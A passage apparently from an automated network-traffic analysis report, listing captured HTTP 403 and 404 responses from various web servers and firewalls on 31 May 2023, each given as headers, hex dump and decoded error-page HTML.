20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 31 May 2023 12:51:56 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:52:04 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9I5HPTOLddwzAsaGTtqCJxEcNrLcY8jS9epXl4XGb1LivFHwdpivKIrZ3nvfKd0hzyXFZwyyNtXlzf41qxs64zpEqaQld55z3Qh0759Gl%2BDp5n6YlLIfRIQp6WD0XQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7cff59b7dd7e2be9-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 Data Ascii: 11a0<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:51:50 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:50 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdR+KIVPfgRMI8Uu3xBu5ub,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=X-Wix-Request-Id: 1685537510.19816164742415869X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:51 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:51 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hfi0sGWUPRyOz%2Bb%2Bg%2BAM6xYUe%2FAuwKadKpfuaD3zHcOjlAAP%2BYJviAmQZvqEMZn5fKcECi3s%2BNAkakQkWVQ33kfrYHOHwnlZQcbwA6mXopjCXCJTZCOSsKhG2zOispt3KA4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59c8db6535ed-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-heig
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 0aec370e-8983-4406-8ca7-6ec713d03cd3CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=smdZQb0kKTRAdG9S%2BDGWMTbfH6uL8bumI%2BWDeyBZngYhSFh0tCOf7bgU2jMLJ6Y35TMiy8SXD09chUZtaL5DjCpyFwzwOEG2N4cp9NkF61FhoGN5DZdSQ1eO4PRrDcw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=136.999846Server: cloudflareCF-RAY: 7cff59d0ba74046e-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:56:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15012X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 